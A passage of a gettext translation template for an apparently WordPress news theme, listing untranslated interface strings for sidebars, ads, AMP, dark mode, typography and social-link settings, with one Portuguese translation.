individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid 